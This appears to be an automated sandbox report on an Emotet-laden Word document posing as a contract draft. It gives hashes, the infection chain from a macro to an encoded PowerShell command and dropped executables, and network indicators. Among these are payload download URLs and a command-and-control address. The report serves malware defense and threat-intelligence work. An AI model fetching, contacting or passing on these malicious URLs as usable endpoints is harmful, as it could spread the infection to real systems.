File name: Projekt_umowy_851858_18_09_2019.doc

Full analysis: https://app.any.run/tasks/ee108ac8-b50e-4088-a528-012a7ab6f4cb
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: September 19, 2019, 12:25:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, emotet-doc, emotet, generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Bahamas Turnpike, Subject: Tasty Granite Table, Author: Kellie Larson, Comments: Points, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:22:00 2019, Last Saved Time/Date: Wed Sep 18 07:22:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 14718C85B37F87F4ED4ACF83CA6E9774
SHA1: 78B11AEE5F7236E239FDDA8DE1195C0E9706130D
SHA256: 46E902CC690517928A63C5C5A7C3A97822C6B9A00D353839094065432047C122
SSDEEP: 6144:mVqZiq86MofT1K82zw1qWKWPLkIp7NSU4jJntATfDnAvLipwwPCQ3cq4:mVqZiq86MofT1K82zw1qWKEXp7NSU4Vx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • easywindow.exe (PID: 3988)
      • 373.exe (PID: 2352)
      • 373.exe (PID: 3764)
      • 373.exe (PID: 2592)
      • 373.exe (PID: 3648)
      • easywindow.exe (PID: 3872)
      • easywindow.exe (PID: 2940)
      • easywindow.exe (PID: 3072)
    • Emotet process was detected

      • 373.exe (PID: 2592)
  • SUSPICIOUS

    • Starts itself from another location

      • 373.exe (PID: 2592)
    • Application launched itself

      • 373.exe (PID: 2352)
    • PowerShell script executed

      • powershell.exe (PID: 2504)
    • Executed via WMI

      • powershell.exe (PID: 2504)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2504)
      • 373.exe (PID: 2592)
    • Creates files in the user directory

      • powershell.exe (PID: 2504)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3560)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3560)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Bahamas Turnpike
Subject: Tasty Granite Table
Author: Kellie Larson
Keywords: -
Comments: Points
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 06:22:00
ModifyDate: 2019:09:18 06:22:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Kub, Ziemann and Cummerata
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Reilly
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
All screenshots are available in the full report
Total processes: 44
Monitored processes: 10
Malicious processes: 5
Suspicious processes: 0

Behavior graph

Process chain shown in the graph (edge labels: start, drop and start, drop and start; the interactive graph is only in the full report):
  • winword.exe (no specs)
  • powershell.exe
  • 373.exe (no specs)
  • 373.exe (no specs)
  • 373.exe (no specs)
  • 373.exe (#EMOTET)
  • easywindow.exe (no specs)
  • easywindow.exe (no specs)
  • easywindow.exe (no specs)
  • easywindow.exe

Process information

PID: 3560
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Projekt_umowy_851858_18_09_2019.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2504
CMD: powershell -encod …
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2352
CMD: "C:\Users\admin\373.exe"
Path: C:\Users\admin\373.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3648
CMD: "C:\Users\admin\373.exe"
Path: C:\Users\admin\373.exe
Parent process: 373.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3764
CMD: --92e680ed
Path: C:\Users\admin\373.exe
Parent process: 373.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2592
CMD: --92e680ed
Path: C:\Users\admin\373.exe
Parent process: 373.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3988
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: 373.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2940
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3072
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3872
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: - (still running)
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 1 774
Read events: 1 282
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR9B3B.tmp
Type: cvr
MD5: -
SHA256: -

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7008E496.wmf
Type: wmf
MD5: 54A8ADA035030C484825803EE555E943
SHA256: 2E087EC6AF53079C67F8E8750BC4CACB7DB780850C7B94412FAF73C3F9BB3D44

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC4851DA.wmf
Type: wmf
MD5: C1F86145E6E5F59B0741FEAB064B1A1F
SHA256: 355EE52D5F9BDF2CBC27AA60106F071108AD488721153B675947C9B7941903F8

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: C6CCA38B653CB96CEE4D992EC1160316
SHA256: 77F064971B2635212437CD454AD10DE0235CB7328581A6ADBE5D417BDE35AD12

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89E020AE.wmf
Type: wmf
MD5: 261B351E9725D6B8EC9892B84E6C6C72
SHA256: C3C07A7CB2C05D6B31E6053DDAE2677E42A66639D744B02E3EB32D98AE5C2856

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92CDA042.wmf
Type: wmf
MD5: E11D32D235C0751A5D7246B7E1615112
SHA256: C8541DDBAEB7E7FB5DBA1B8AB79B8B1763DEC71D9408F6E033F2B2454E91AA30

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A2EE3514.wmf
Type: wmf
MD5: 82228F7DE41BF35135FAD1EB26E35806
SHA256: 0F64C65C1FFCC6F25F08EFDC19CB01E5391E20989B29012CAE85751769414722

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58DD80EC.wmf
Type: wmf
MD5: 804F5936D97FF7A00E66E67F5FEEBECE
SHA256: 78426996488E914B174A5986341D87F6A9BC290EBAF916AF1C4F080C693614DA

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42D85748.wmf
Type: wmf
MD5: 7F6AF9D6F307F7E010DF08B57B5390C7
SHA256: A54DC2396005CDBCC86640771776C0F69170BE5F4A4D5EF6D665216B65F09624

PID: 3560
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBDFE9A0.wmf
Type: wmf
MD5: 063817742173A9018C9E1AEEB9A9A2AD
SHA256: 9C4629C5B20919A11084C966B66D29F5FF6A61B2136226A3CFDA7903762EEB5D
HTTP(S) requests: 2
TCP/UDP connections: 5
DNS requests: 4
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2504 | powershell.exe | GET | 406 | 93.191.156.116:80 | http://saxtorph.net/DOC/5ndqov018/ | DK | html | 221 b | suspicious
3872 | easywindow.exe | POST | - | 114.79.134.129:443 | http://114.79.134.129:443/prov/ | IN | - | - | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2504 | powershell.exe | 45.120.148.57:443 | sukhumvithomes.com | A2 Hosting, Inc. | SG | suspicious
2504 | powershell.exe | 173.254.28.118:80 | dirproperties.com | Unified Layer | US | suspicious
2504 | powershell.exe | 93.191.156.116:80 | saxtorph.net | Zitcom A/S | DK | suspicious
3872 | easywindow.exe | 114.79.134.129:443 | - | D-Vois Broadband Pvt Ltd | IN | malicious
2504 | powershell.exe | 81.169.145.69:80 | run-germany.com | Strato AG | DE | malicious

DNS requests

Domain | IP | Reputation
dirproperties.com | 173.254.28.118 | suspicious
run-germany.com | 81.169.145.69 | malicious
saxtorph.net | 93.191.156.116 | suspicious
sukhumvithomes.com | 45.120.148.57 | suspicious

Threats

No threats detected
No debug info